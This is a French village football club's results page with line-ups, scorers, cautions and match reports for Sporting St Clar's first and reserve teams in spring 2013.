1/2 FINALE DU CHALLENGE DISTRICT : ST CLAR II – SCPAS III : 3-2
Equipe : 1. L. Gamot, 2. M. Berto, 3. D. Solagna, 4. C. Lecoublet, 5. PM. Sabarros, 6. V. Taupiac (Cap), 7. M. Huntz, 8. C. Suzes, 9. J. Lasserre, 10. A. Mouchet, 11. V. Lucas. Rempl: 12. C. Maillasson, 13. M. Xompero, 14. P. Pinto, Coach: C. Boukkera Buts: V.Lucas (3ème), M.Berto (30ème), J.Lasserre (60ème) Avertissement: L.Gamot (Anti-jeu), M.Huntz (Fautes à répétition) Pour cette demi-finale du Challenge, les réservistes recevaient l’équipe III de St Christie Preignan. Devant de nombreux supporters, les rouges et jaunes attaquent tambour battant et au bout de 3mn de jeu sur un joli centre excentré de Captain « Taupi » « Bono » d’une très joli tête envoie le ballon au fond des filets, 1-0. Les St Clarais ne pouvaient pas mieux démarrer cette rencontre. La partie retombe d’intensité, les visiteurs sont dangereux sur coup de pied arrêté mais ils sont trop approximatifs pour le moment pour inquiéter « Lolo ». A la demi-heure de jeu sur une attaque rapide, « Cissou » sur son côté droit prend son vis-à-vis de vitesse et centre, un défenseur adverse touche le ballon du bras dans la surface, pénalty, que « Matt » transforme en puissance avec l’aide de la barre, 2-0. L’équipe adverse se montre dangereuse et sur un coup franc anodin le long de la ligne de touche, la défense St Claraise se fait surprendre au deuxième poteau au grand dam de « Coach Bouki », 2-1, mi-temps. Après la pause, c’est St Christie qui se montre dangereux et il faut deux belles parades de « Lolo » pour empêcher l’égalisation. Les réservistes se rebiffent et à l’heure de jeu sur un service de « Mouchet », « Pampouille » rentre dans la surface, joue de sa technique et vient marquer de prés du gauche, 3-1, le break est fait. St Clar continue d’attaquer, « Cissou » et « Christo » sont tout près de marquer le 4ème but du match, mais le dernier geste fait défaut. On est dans le temps additionnel depuis 7mn quand sur un dernier renvoi de la défense St Claraise, un joueur adverse tente sa chance au 25m, et marque, 3-2. Sur l’engagement l’arbitre siffle la fin du match et les jaunes et rouges laissent éclater leur joie. Jolie qualification des réservistes pour leur 4ème finale de suite dans cette compétition. Rendez –vous donc tous à Auch début juin. Samedi un autre gros match attend les jaunes et rouges, réception de l’équipe Eauze pour le match de la montée en division supérieure…
« Pampouille et Mouchet » un duo d’attaque efficace sur le terrain et en dehors…
Résultats du week-end (04/05/13):
Carton plein pour le Sporting à Aignan
Ce week-end les deux équipes du Sporting se déplaçaient à Aignan, l’équipe fanion créa la surprise en allant s’imposer chez le leader de la poule et les réservistes continuent sur leur rythme effréné de victoire en autant de match…
CHAMPIONNAT DE 1ère DIVISION : AIGNAN II – ST CLAR II : 2-3
Equipe : 1. L. Gamot, 2. D. Solagna, 3. M. Berto, 4. C. Lecoublet, 5. PM. Sabarros, 6. V. Taupiac (Cap), 7. M. Huntz, 8. C. Suzes, 9. J. Lasserre, 10. C. Maillasson, 11. V. Lucas. Rempl: 12. P. Pinto, 13. M. Xompero, 14. A. Arroues, Coach: C. Boukkera Buts: V.Lucas (50ème), A.Arroues (60ème), C.Suzes (80ème) Avertissement: Ce déplacement à Aignan n’a pas été une partie facile, l’équipe locale alignant une équipe compétitive. Les St Clarais sont les premiers à se mettre en action, au bout de 5mn de jeu, « Christo » loupe son duel face au gardien. Les jaunes et rouges continuent d’attaquer, « Bono » d’une tête plongeante croit ouvrir le score, mais l’arbitre signale un hors-jeu. Les joueurs d’Aignan posent le jeu et accentuent leur pression notamment sur coup de pied arrêté et ensuite c’est la barre transversale qui sauve « Lolo ». Sur un corner mal renvoyé, ce qui devait arriver arriva, un joueur local envoie le ballon de la tête dans les filets de « Lolo », 1-0. Les réservistes bafouillent leur football et les approximations défensives font avoir quelques sueurs à coach « Bouki », la mi-temps est atteinte sur ce score de 1-0. Après la pause et un recadrage de « Bouki », les joueurs du Sporting montrent un autre visage, et c’est « Bono » sur une balle en profondeur qui vient battre le gardien avec un peu de chance, 1-1. Dans la foulée du coup d’envoi et sur plusieurs erreurs défensives, Aignan reprend l’avantage, 2-1. Le jeu reprend, « Matt » déborde, centre pour « Arroues » qui accrobatiquement du gauche envoie le ballon dans les buts, 2-2. St Clar continue d’attaquer, « Micka » sert « Cissou » dans la surface mais le faux rebond l’empêche d’envoyer le ballon dans les buts. Les jaunes et rouges ne relâchent pas la pression et à 10mn de la fin, « Cissou » lancé en profondeur par « Micka », ne se fait pas prier pour dribbler le gardien et envoyer le ballon au fond des filets, 2-3. Les dernières minutes de la rencontre seront bien gérées par les réservistes. Coup de chapeau à l’arbitre bénévole du centre auteur lui aussi d’une bonne partie qui à remplacer l’arbitre officiel absent. Victoire difficile pour les réservistes à l’extérieur mais importante avant le choc de samedi prochain face au concurrent direct à la montée, Eauze. Mais avant ça, mardi réception de SCPAS III en demi-finale du Challenge du District.
« Cissou » auteur du but vainqueur
CHAMPIONNAT D’EXCELLENCE : AIGNAN – ST CLAR : 0-2
Equipe : 1. Baptiste. Peotta, 2. A. Davasse, 3. R. Boukkera, 4. F. Larribeau, 5. Benjamin. Peotta, 6. F. Moussaron (Cap), 7. B. Sabarros, 8. T. Hrodej, 9. N. Cantaloup, 10. L. Delavat, 11. L. Fabbro. Rempl: 12. C. Malateste, 13. S. Buttigieg, 14. T. Larribeau, Coach: J.Blancard Buts: N.Cantaloup (10ème), L.Fabbro (15ème) Avertissements: F.Larribeau (Anti-jeu), A.Davasse (Tacle dangereux) L’équipe fanion reboostée par une victoire contre Val d’Arros, se déplaçait chez le leader avec l’intention de faire bonne figure. Au bout de 10mn de jeu, « Nico » récupère un ballon au milieu de terrain, s’avance et frappe de 25m, le gardien est battu, 0-1. St Clar continue d’attaquer et dans la foulée, « Lolo » décoche une jolie frappe qui va taper le poteau puis rentrer dans les buts, 0-2. Belle entame des jaunes et rouges, les joueurs locaux ne s’attendaient pas à pareille efficacité. Surtout que « Ludo » est tout près de marquer le 3ème but quelques minutes plus tard, mais sa frappe passe à côté. Aignan développe son jeu, mais la défense St Claraise tient bon et « Bats » est déterminé à ne pas prendre de but. La mi temps est atteinte sur le score de 0-2 en faveur de St Clar. Après la pause citron, les jaunes et rouges s’arc-boutent en défense, le travail étant déjà fait en première mi-temps, « Bats » impérial dans ses sorties et sur sa ligne repousse les attaques des joueurs locaux et l’équipe entière se met au diapason pour garder ces deux buts d’avance. Une dernière frayeur à quelques minutes de la fin, mais la barre repousse le tir. Très jolie victoire des joueurs du Sporting chez le leader de la poule et très belle opération au point de vue comptable pour le maintien. Samedi prochain réception de Eauze pour essayer de continuer sur cette belle série de match sans défaite…
Belle performance de tous les joueurs de l’équipe fanion du SCSC
Résultat de la semaine (01/05/13):
La réserve du Sporting continue sur sa lancée…
En match en retard, l’équipe II du Sporting recevait en cette fin d’après-midi son homologue du RBA, un concurrent direct à la montée. Les réservistes sortent vainqueur de ce duel.
CHAMPIONNAT DE 1ère DIVISION : ST CLAR II – RBA II : 2-0
Equipe : 1. L. Gamot, 2. M. Berto, 3. P. Pinto, 4. D. Solagna, 5. C. Lecoublet, 6. V. Taupiac (Cap), 7. M. Huntz, 8. T. Hrodej, 9. C. Suzes, 10. C. Maillasson, 11. J. Lasserre. Rempl: 12. F. Larribeau, 13. V. Lucas, 14. M. Xompero, Coach: C. Boukkera Buts: V.Lucas (35ème), M.Xompero (85ème) Avertissements: J.Lasserre (Geste dangereux), F.Larribeau (Contestation) Pour ce match en retard, les réservistes recevaient une équipe du RBA déterminée. Le match commence sur un faux rythme, beaucoup de petites fautes sifflées ce qui rend le match haché. Il faut attendre les premiers coups francs pour voir les jaunes et rouges s’illustrer mais ni “Christo” et “Pampouille” ne profite de la largesse du gardien adverse. Les visiteurs posent leur jeu et sur un balle en profondeur il faut toute la détermination de “Titcho” dans la surface pour éviter l’ouverture du score. Coach Bouki procède à quelques réajustements… “Cissou” déboule sur son côté droit et centre parfaitement pour “Bono” qui d’un tacle rageur pousse le ballon au fond des filets, 1-0. St Clar continue d’attaquer, encore sur un centre de “Cissou”, “Pampouille” au deuxième poteau est trop cour pour bien ajuster sa tête. La mi-temps est sifflée sur ce score de 1-1. Après la pause pâtes de fruits chère à “Lolo”, le match retombe dans un faux rythme, beaucoup d’approximations et de maladresses de part et d’autre. Le RBA pousse un peu plus leur action mais la défense St Claraise est sérieuse et appliquée. On s’approche de la fin du match, quand “Bono” lancé en profondeur sur son côté devance la sortie du gardien hors de sa surface et sert sur un plateau “Micka” au point de pénalty qui marque le but du break, 2-0. L’arbitre siffle la fin du match. Très bonne opération des réservistes qui se retrouvent seul 2ème du championnat mais samedi un déplacement pas simple les attend à Aignan.
“Bono” grâce à sa polaire a été le détonateur du match
Résultats de la semaine (24/04/13) et du week-end (27/04/13):
Le Sporting se relance à domicile
La semaine dernière, l’équipe fanion du Sporting s’est rassurée à domicile après une série de quatre défaites au Stade de Labarthète. Tout d’abord un joli match nul en semaine contre Panassac une équipe jouant la montée en PL puis enfin une belle victoire contre Val d’Arros samedi. L’équipe réserve quant à elle n’a pu disputer son match contre Val d’Arros II, l’équipe visiteuse déclarant forfait dans l’après-midi.
CHAMPIONNAT D’EXCELLENCE : ST CLAR – SUD ASTARAC : 2-2
Equipe : 1. Baptiste. Peotta, 2. B. Sabarros, 3. R. Clavel, 4. PM. Sabarros, 5. Benjamin. Peotta, 6. F. Moussaron (Cap), 7. C. Malateste, 8. L. Delavat, 9. N. Cantaloup, 10. A. Mouchet, 11. L. Fabbro. Rempl: 12. S. Buttigieg, 13. A. Virelaude, 14. A. Davasse, Coach: C.Boukkera Buts: F.Moussaron (13ème), S.Buttigieg (60ème) Avertissements: A.Virelaude (Carton rouge), R.Clavel (Tacle dangereux), F.Moussaron (Tacle dangereux), PM.Sabarros (Tacle dangereux) Pour ce match en semaine, les joueurs avaient à cœur de casser cette spirale de défaite à domicile, et c’est « Mouss » en tout début de match qui montre la voix à ses coéquipiers, il ouvre le score d’un très joli extérieur du pied au 25m qui laisse le gardien sans réaction, 1-0. Sud Astarac est très approximatif dans son jeu et ses passes à cause d’un pressing à toute épreuve des jaunes et rouges. La mi-temps se rapproche et sur le dernier corner, Sud Astarac égalise, but entaché d’une faute de main non vue par les officiels de la rencontre…Mi-temps : 1-1. Après la pause, les jaunes et rouges repartent à l’attaque, et à l’heure de jeu, sur une balle en profondeur « Nico » à l’expérience obtient un pénalty indiscutable que « Stephen » transforme sans trembler, 2-1. « Mous » et « Kinou » obtiennent de belles occasions de marquer le but du break mais le dernier geste fait défaut. Sud Astarac reprend la possession du ballon et il faut une belle parade de « Bats » pour éviter l’égalisation sur corner. On est dans le temps additionnel, Sud Astarac obtient le dernier corner, le ballon frappe le poteau, un cafouillage s’ensuit, le ballon est touché par le bras d’un joueur visiteur, l’arbitre du centre ne bronche pas, dans la continuité de l’action un joueur de Sud Astarac s’écroule dans la surface suite à un choc avec « Palof », et là l’arbitre siffle pénalty. Après le calme revenu et l’expulsion d’un joueur de chaque côté, le tireur visiteur ne laisse aucune chance à « Bats », 2-2. Fin du match. Belle rencontre des St Clarais avec une envie retrouvée ce qui s’avèrera payant par la suite.
« Stephen » n’a pas tremblé au moment de tirer son pénalty
CHAMPIONNAT DE 1ère DIVISION : ST CLAR II – VAL D’ARROS II : 3-0 FORFAIT
Après ce forfait de Val d’Arros II, les réservistes se retrouvent seul 2ème de leur poule et affronteront cet après-midi à 17h le RBA II un concurrent direct à la montée… un joli duel au programme.
CHAMPIONNAT D’EXCELLENCE : ST CLAR – VAL D’ARROS : 4-1
Equipe : 1. Baptiste. Peotta, 2. A. Davasse, 3. B. Sabarros, 4. PM. Sabarros, 5. Benjamin. Peotta, 6. F. Moussaron (Cap), 7. C. Malateste, 8. L. Delavat, 9. N. Cantaloup, 10. A. Mouchet, 11. L. Fabbro. Rempl: 12. R. Boukkera, 13. S. Buttigieg, 14. C. Boukkera, Coach: J.Blancard Buts: C.Malateste (30ème), L.Delavat (45ème), N.Cantaloup (65ème) (70ème) Avertissement: L’équipe fanion recevait Val d’Arros un concurrent direct au maintien, une belle occasion de s’éloigner de la zone rouge. Le début de match commence par une possession de balle des visiteurs, St Clar ne prenant pas de risque en restant bien en place défensivement en attendant que l’orage passe. A la demi-heure de jeu « Kinou » ressort le ballon du milieu du terrain, n’étant pas attaqué, il tente sa chance des 25m et trouve le chemin des filets, 1-0. Les jaunes et rouges continuent d’attaquer, « Nico » est tout près de doubler la mise sur coup franc mais le gardien détourne le ballon en corner. On se rapproche de la mi-temps, « Ludo » replacé en pointe ne met pas longtemps à s’illustrer et double la mise en devançant le gardien visiteur, 2-0. Après la pause, sur l’engagement « Ludo » subtilise le ballon, dribble deux joueurs et lance « Nico » sur un plateau mais son tir passe à côté. A la 55ème minute Val d’Arros obtient un coup franc excentré, l’attaquant adverse vient couper la trajectoire du ballon en taclant et prend « Bats » à contre-pied, 2-1. Val d’Arros reprend confiance mais 10mn plus tard « Nico » d’un joli geste acrobatique marque le but du break, 3-1. Les rouges et jaunes obtiennent un coup franc au 25m plein axe, « Nico » chaud bouillant s’en charge et arrache l’araignée, 4-1. Plus rien ne sera marqué dans cette rencontre, l’équipe fanion confirme son bon match de la semaine et s’éloigne par la même occasion des équipes relégables mais attention à ne pas se relâcher car rien n’ai joué dans ce championnat.
Merci à « Gégé » pour la 3 ème mi-temps au Café de La Bascule à St Clar
Résultat de la semaine (17/04/13):
Les Demies pour le Sporting en Challenge du District
En ce mercredi soir, l’équipe réserve de St Clar reçevait Pauilhac pour les ¼ de Finale du Challenge du District. Les jaunes et rouges malgré la fatigue n’ont rien lâché…
¼ DE FINALE DU CHALLENGE DISTRICT: ST CLAR II – PAUILHAC II : 4-1
Equipe : 1. L. Gamot, 2. P. Patrick, 3. D. Solagna, 4. C. Lecoublet, 5. A. Virelaude, 6. V. Taupiac (Cap), 7. T. Hrodej, 8. C. Suzes, 9. J. Lasserre, 10. S. Jeangrand, 11. V. Lucas. Rempl: 12. C. Maillasson, 13. M. Xompero, 14. F. Cau, Coach: C. Boukkera Buts: V.Taupiac (23ème) (60ème), J.Lasserre (35ème), C.Maillasson (70ème) Avertissement: Pour ces ¼ de Finale, les jaunes et rouges St Clarais affrontaient leurs voisins de Pauilhac. Malgré un match de haut de tableau joué dimanche au RBA sous une grosse chaleur, St Clar sont les premiers à attaquer mais les jambes ont du mal à se mettre en route. « Bono » comme toujours est le premier à attaquer sur son côté mais c’est trop approximatif pour inquiéter le gardien adverse. Au bout de 20mn de jeu, sur un coup franc excentré, le ballon touche le bras d’un défenseur Pauilhacais dans la surface, l’arbitre désigne le point de pénalty, « Mat » absent pour cause de blessure c’est donc « Taupi » qui se charge de le tirer, contre-pied parfait, 1-0. St Clar ne relâche pas son effort, « Bono » part dans ses œuvres côté gauche et d’un centre tir trouve « Pampouille » dans la surface qui ne se fait pas prier pour marquer de près, 2-0. Juste avant la mi-temps, sur un centre au deuxième poteau de « Cissou », le défenseur de Pauilhac n’est pas loin de tromper son propre gardien, mais la barre repousse le tir. Mi-temps : 2-0. Au retour des vestiaires, les Saint Clarais marquent le coup physiquement et Pauilhac en profite pour réduire le score malgré une belle parade de « Lolo », 2-1. Ce but réveille les réservistes qui repartent de l’avant et sur un centre de « Cissou », « Taupi » au 25m récupère le ballon et envoi un enroulé du gauche dans les filets, 3-1. Les jaunes et rouges continuent d’attaquer et sur une action très bien construite, « Micka » du gauche centre parfaitement au 18m pour « Christo » en pleine course qui ne se fait pas prier pour mettre le 4ème but de la partie, 4-1. Plus rien ne sera marqué dans la rencontre, joli match des réservistes qui recevront SCPAS III pour les ½ Finale le mercredi 8 mai à 20h.
Une coupe qui tient à cœur à « Coach Bouki »
Résultats du week-end (13/04/13):
Week-end mitigé pour le Sporting
Ce week-end, les deux équipes du Sporting se déplaçaient. L’équipe fanion revient bredouille de son déplacement à Panassac, tandis que les réservistes font la bonne opération en allant gagner au RBA.
CHAMPIONNAT DE 1ère DIVISION: RBA II – ST CLAR II : 0-1
Equipe : 1. L. Gamot, 2. M. Berto, 3. P. Pinto, 4. V. Taupiac (Cap), 5. D. Solagna, 6. J. Lasserre, 7. T. Hrodej, 8. C. Suzes, 9. S. Jeangrand, 10. C. Maillasson, 11. V. Lucas. Rempl: 12. M. Xompero, 13. F. Gobatto, 14. C. Lecoublet, Coach: C. Boukkera But: V.Taupiac (55ème) Avertissement: Dimanche, en déplacement à Estang face à un concurrent direct au podium, les réservistes ont réalisé un match sérieux et ramènent une très belle victoire. Ce sont les locaux qui se procurent la première occasion mais les attaquants Saint-Clarais ne sont pas en reste et “Cissou” et “Christo” sont tout près d’ouvrir le score. Dès la reprise, c’est le capitaine “Taupi” qui, du plat du pied, reprend un dégagement approximatif d’un défenseur adverse. Dès lors, Saint-Clar va défendre ce but d’avance grâce à la solidarité qui est leur marque de fabrique. Et quand les défenseurs sont en difficulté, c’est “Lolo” qui réalise deux parades décisives. Avec cette victoire, les saint-clarais remontent à la seconde place ex-aequo avec Eauze . Pas le temps de souffler pour l’équipe II qui, dès Mercredi, affronte les voisins Pauilhacais en ¼ de Finale du Challenge du District.
CHAMPIONNAT D’EXCELLENCE : SUD ASTARAC – ST CLAR : 3-1
Equipe : 1. Baptiste. Peotta, 2. A. Davasse, 3. R. Clavel, 4. PM. Sabarros, 5. Benjamin. Peotta, 6. B. Sabarros, 7. F. Moussaron (Cap), 8. L. Delavat, 9. N. Cantaloup, 10. A. Mouchet, 11. L. Fabbro. Rempl: 12. S. Buttigieg, 13. R. Boukkera, 14. M. Huntz, Coach: J.Blancard But: N.Cantaloup (20ème) Avertissement: Chez un prétendant au titre, les Saint-Clarais entament bien le match et ouvrent la marque à la demi-heure de jeu grâce à « Nico » qui profite d’une mésentente entre le gardien local et un de ses défenseurs. Malheureusement, juste avant la pause, les visiteurs concèdent un coup franc dont la trajectoire bizarre surprend « Bats ». Saint-Clar est tout près de reprendre l’avantage juste après la pause sur un coup franc dévié de « Papy » qui heurte la barre transversale. Sur l’action suivante, Sud Astarac obtient un pénalty et prend l’avantage avant de faire le break sur un nouveau pénalty. Il reste maintenant 6 matches pour assurer le maintien.
L’équipe fanion sur le terrain de Panassac
Résultats du week-end (06/04/13):
Le Sporting piétine de nouveau à domicile
Ce week-end, les deux équipes du Sporting recevaient sur leur terrain. Les réservistes n’ont pas pu se mesurer à leurs homologues de Duran. Duran déclarant forfait dans l’après-midi tandis que l’équipe fanion renoue avec ses démons en championnat.
CHAMPIONNAT DE 1ère DIVISION: ST CLAR II – DURAN II : 3-0 FORFAIT
Après ce forfait de Duran II, les réservistes iront au RBA dimanche prochain à 13h pour un match de haut de tableau. Les deux équipes sont séparées que de 1 point au classement mais le RBA comptant un match de retard de plus que les réservistes St Clarais… un joli duel au programme.
Une équipe réserve soudée après sa victoire lors du déplacement à Manciet, le même état d’esprit sera de rigueur dimanche au RBA
CHAMPIONNAT D’EXCELLENCE : ST CLAR – SIMORRE : 1-2
Equipe : 1. Baptiste. Peotta, 2. A. Davasse, 3. R. Boukkera, 4. PM. Sabarros, 5. Benjamin. Peotta, 6. R. Clavel, 7. V. Taupiac, 8. L. Delavat, 9. N. Cantaloup (Cap), 10. S. Buttigieg, 11. L. Fabbro. Rempl: 12. F. Moussaron, 13. C. Suzes, 14. T. Hrodej, Coach: J.Blancard But: L.Delavat (65ème) Avertissements: L’équipe fanion recevait Simorre, c’était une bonne occasion de s’éloigner un peu plus de la zone de relégation après la victoire à Vallée de l’Arrats le week-end dernier… Le début de match commence avec quelques jolies actions côté St Clarais, notamment par « Ludo » très en jambe mais les tirs sont trop approximatifs pour inquiéter le portier adverse. Petit à petit Simorre commence à prendre possession du ballon et à installer son jeu, au bout de 20mn sur un relâchement en milieu de terrain, l’attaquant seul au 25m et sans pression, frappe et marque, 0-1. Simorre continue sur sa lancée et sur un centre mal intercepté par la défense jaune et rouge, l’attaquant adverse reçoit le ballon dans les pieds et ne se fait pas prier pour marquer le deuxième but du match, 0-2. Les St Clarais se réveillent alors et se procurent quelques belles occasions, notamment par « Lolo » mais son tir enroulé est dévié et surtout par « Ludo » mais sa tête puissante est stoppée de la poitrine sur sa ligne par le défenseur adverse. La mi-temps est sifflée sur ce score de 0-2 en faveur de Simorre. Après la pause, la rentrée de « Mouss » va apporter plus d’envie à cette équipe St Claraise. Sur un coup de pied arrêté, après un cafouillage, « Nico » envoie le ballon au fond des filets, l’arbitre valide le but d’un signe de la main vers le rond central, mais après moulte protestations des joueurs adverses pour une faute de main de « Nico », il revient sur sa décision… Sur un long ballon de la défense St Claraise, « Mouss » dévie de la tête pour « Ludo » qui d’une demie volée du droit envoie le ballon en lucarne, 1-2. Les jaunes et rouges continuent leur pressing et sur une frappe en cloche des 20m, le défenseur adverse détourne le ballon des mains dans la surface de réparation, l’arbitre ne bronche pas… Sentant qu’ils peuvent revenir au score, St Clar pousse, et sur une action individuelle de « Ludo » dans la surface de Simorre, il s’écroule, l’arbitre du centre ne bronche pas et il faut toute l’honnêteté de son arbitre assistant pour qu’il désigne le point de penalty. « Nico » s’en charge mais le gardien part du bon côté et repousse le tir, quand ça veut pas, ça veut pas…Plus rien ne sera marqué dans cette rencontre, nouvelle défaite sur son terrain des St Clarais et les poursuivants se rapprochent à grand pas. Week-end prochain déplacement difficile à Sud Astarac un prétendant à la montée.
“Ludo” dans tout les bons coups samedi soir
Résultats du week-end (23/03/13):
Deux déplacements fructueux pour le Sporting
Ce week-end, les deux équipes du Sporting se déplaçaient à l’extérieur. Les réservistes confirment leur forme en allant s’imposer à Manciet tandis que l’équipe fanion renoue avec la victoire en gagnant à Vallée de l’Arrats, deuxième du championnat.
CHAMPIONNAT DE 1ère DIVISION: MANCIET II – ST CLAR II : 0-2
Equipe : 1. L. Gamot, 2. M. Berto, 3. P. Pinto, 4. D. Solagna, 5. C. Lecoublet, 6. V. Taupiac (Cap), 7. T. Hrodej, 8. V. Lucas, 9. J. Lasserre, 10. C. Maillasson, 11. C. Suzes. Rempl: 12. M. Xompero, 13. F. Gobatto, 14. C. Boukkera, Coach: C. Boukkera Buts: J.Lasserre (44ème), T.Hrodej (53ème) Avertissement: Les réservistes se déplaçaient à Manciet, une rencontre pas si simple que cela à négocier. Le match commence timidement, les rouges et jaunes ont du mal à poser leur jeu et se sont les joueurs locaux qui se montrent les premiers dangereux. St Clar réplique, « Bono » file sur son côté droit et centre, mais « Pampouille » est trop court pour reprendre le ballon. Les St Clarais continuent leur pressing, et sur une balle en profondeur, « Bono » devance son vis à vis, contrôle de la poitrine et frappe mais le gardien détourne des pieds. Manciet obtient un corner et il faut toute la vigilance de « Lolo » pour repousser une frappe de près. Les réservistes enchaînent les attaques, notamment par « Christo » et « Cissou » mais rien ne rentre. On se rapproche de la mi-temps, quand sur une balle en profondeur, « Christo » va au duel avec le défenseur, celui-ci se télescope avec son gardien sorti, le ballon revient sur « Micka » qui frappe, un défenseur détourne la balle et « Pampouille » en renard des surfaces vient pousser le ballon au fond des filets, 0-1. Mi-temps. Au retour des vestiaires, « Coach Bouki » pousse ses joueurs à être plus entreprenant, et sur une touche vite jouée par « Micka », « Tom » tire des 25m et marque avec la complicité du gardien, 0-2. Manciet se rebiffe et il faut une splendide claquette de « Lolo » pour éviter la réduction du score. Les joueurs locaux continuent d’attaquer, et sur une charge un peu trop virulente dans la surface d’un St Clarais, le point de pénalty est désigné. « Lolo » part du bon côté et détourne le ballon. L’attaquant local arrivé en court de match continue de faire des misères à la défense de St Clar, il faut encore un « Lolo » chaud bouillant pour détourner une frappe du pied. L’orage passé, les dernières minutes du match seront bien gérées par les St Clarais qui auraient pu même alourdir le score notamment par « Flo » sur un joli service de « Cissou ». Fin du match, 0-2. A noter, l’absence d’arbitre officiel, joliment suppléé par un dirigeant local. Week-end prochain match de rattrapage contre le RBA à domicile, une belle rencontre du haut de tableau en perspective, de quoi motiver les récalcitrants de l’entraînement du mardi soir…
“Lolo” en plein cri de guerre, auteur d’une énorme seconde période
CHAMPIONNAT D’EXCELLENCE : VALLEE DE L’ARRATS – ST CLAR : 0-1
Equipe : 1. Baptiste. Peotta, 2. A. Davasse, 3. B. Sabarros, 4. PM. Sabarros, 5. Benjamin. Peotta, 6. Y. Abdou, 7. F. Moussaron (Cap), 8. L. Delavat, 9. N. Cantaloup, 10. A. Mouchet, 11. L. Fabbro. Rempl: 12. S. Buttigieg, 13. C. Malateste, Coach: J.Blancard But: L.Fabbro (47ème) Avertissement: N.Cantaloup (Contestation) Malgré la mauvaise passe, les Saint-Clarais partaient à Aubiet sans pression, mais bien décidé à retrouver leurs valeurs collectives et le résultat fut à la hauteur de leurs espoirs. Pourtant, la soirée commence mal avec l’absence au dernier moment de « Palof » qui laisse ses copains à 13. Pour ne rien arranger, dès la 2ème minute du match, c’est le capitaine « Mouss » qui doit rejoindre le banc de touche, victime d’un petit problème de santé (on a quand même eu un peu peur) et c’est « Kinou » qui le supplée. D’entrée de jeu, les jaunes et rouges mettent la pression sur les locaux et le pressing infernal de « Antho », « Nico » et « Lolo » mets très souvent à mal la défense adverse qui est réduite à « balancer » de longs ballons devant quand ce n’est pas en touche. Successivement, « Lolo », « Yass », « Antho » ou « Nico » se procureront de belles opportunités mais leurs frappes passeront à côté, en particulier « Nico » qui face au gardien rate son petit lob. Vallée de l’Arrats, cependant, peut se montrer dangereux sur les coups de pied arrêtés mais la défense, bien regroupée autour d’un « Papy » impérial fait bonne garde. La pause est atteinte sur le score de 0 à 0 et les supporters présents rêvent d’une seconde période identique. Et la réalité de la reprise est au-delà de leur rêve puisque sur un coup franc à l’angle de la surface, « Lolo » frappe le ballon dans les 6m et trompe le gardien avec la complicité de « Nico ». Et pour une fois depuis bien longtemps, Saint-Clar mène au score. Dès lors, les locaux se montrent plus entreprenants et le match devient un peu plus haché avec de nombreuses fautes bien sanctionné par l’arbitre. A l’heure de jeu, la situation se complique avec la sortie de « Kinou », un petit peu énervé. « Stephen » le remplace à la pointe de l’attaque alors que « Nico » redescend d’un cran. Quelques instants plus tard, c’est « Yass », victime d’un tacle appuyé qui doit sortir, obligeant « Mouss » à revenir sur le terrain. La défense Saint-Claraise tient bien le choc face aux locaux qui seront dangereux sur un coup franc très bien tiré qu’un attaquant adverse est tout prêt de reprendre. Les jaunes et rouges, eux, procèdent par contre et, successivement, « Mouss » par deux fois et « Stephen » sont tout près de doubler la mise. Le score en restera là malgré deux derniers corners Aubietins qui font passer un frisson chez les visiteurs. Félicitations à tout le groupe qui a su retrouver ses vertus de combativité et de solidarité. Difficile de ressortir quelqu’un de cette équipe mais une mention spéciale à « Yass » qui n’a pas hésité à revenir « sur une jambe » pour les 5 dernières minutes. Week-end prochain réception de Sud Astarac, en espérant bonifier cette belle victoire à l’extérieur…
Résultats du week-end (16/03/13):
Les week-ends se suivent et se ressemblent pour le Sporting
Ce week-end, les deux équipes du Sporting recevaient sur leur terrain pour deux derbys. Les réservistes se rattrapent de leur défaite à Auch en disposant de Pauilhac tandis que l’équipe fanion n’arrive toujours pas à s’imposer…
CHAMPIONNAT DE 1ère DIVISION: ST CLAR II – PAUILHAC II : 4-0
Equipe: 1. L. Gamot, 2. M. Berto, 3. D. Solagna, 4. A. Davasse, 5. C. Lecoublet, 6. V. Taupiac (Cap), 7. M. Huntz, 8. T. Hrodej, 9. C. Suzes, 10. C. Maillasson, 11. V. Lucas. Rempl: 12. P. Pinto, 13. J. Lasserre, 14. A. Arroues, Coach: C. Boukkera Buts: J.Lasserre (55ème), C.Suzes (65ème), V.Taupiac (75ème), V.Lucas (80ème) Avertissements: A.Arroues (Carton rouge : Comportement violent), V.Taupiac (Désapprobation), M.Berto (Tacle dangereux) Voulant se rattraper de la défaite du week-end dernier à Auch, les réservistes pour ce derby contre Pauilhac entament le match tambour battant notamment par « Dam » qui tente une frappe au 20m. Au bout de 10mn de jeu, sur un centre en retrait de « Bono », « Cissou » au 10m, tire en force mais sa frappe passe largement au-dessus des buts. Pauilhac joue en contre, et sur l’un d’eux suite à une erreur défensive, l’attaquant adverse se retrouve face à « Lolo » mais celui-ci bloque bien le ballon. St Clar monopolise le ballon mais n’arrive pas à forcer le verrou Pauilhacais, malgré des frappes de « Cissou » et « Tom ». On se rapproche de la mi-temps, quand Pauilhac obtient un coup franc au 35m, il faut toute l’attention de « Lolo » pour aller claquer le ballon en corner. Mi-temps : 0-0. Au retour des vestiaires, sur une action individuelle « Cissou » frappe le poteau. Sur l’action suivante, « Tom » s’arrache sur son côté droit et centre au second poteau pour « Pampouille » qui d’une reprise du gauche envoie le ballon au fond des filets, 1-0. Quelques minutes après l’ouverture du score « Antho Arroues » se fait expulser logiquement suite à un geste d’humeur. Les jaunes et rouges même réduit à 10 vont continuer d’attaquer et sur une erreur défensive des joueurs adverses dans la surface, « Cissou » opportuniste ne se fait pas prier pour crucifier le gardien de près, 2-0. Pauilhac essaie de se rapprocher des buts St Clarais mais « Cédrik papa depuis peu» se montre intraitable derrière et ne laisse aucune chance à son ancienne équipe. Sur un centre de « Bono » côté droit, Capitaine « Taupi » y va de son but, une jolie tête décroisée au premier poteau, 3-0. Et à 10mn de la fin, sur un joli centre du gauche de « Pampouille », « Bono » d’une jolie tête vient prendre le gardien à contre-pied, 4-0. Plus rien ne sera marqué dans cette rencontre. Un bon résultat pour les réservistes qui leur permet de rester au contact des premiers de la poule. Week-end prochain déplacement à Manciet juste à quatre points derrière.
“Pampouille” auteur d’une très bonne rentrée
CHAMPIONNAT D’EXCELLENCE : ST CLAR – FLEURANCE II : 0-3
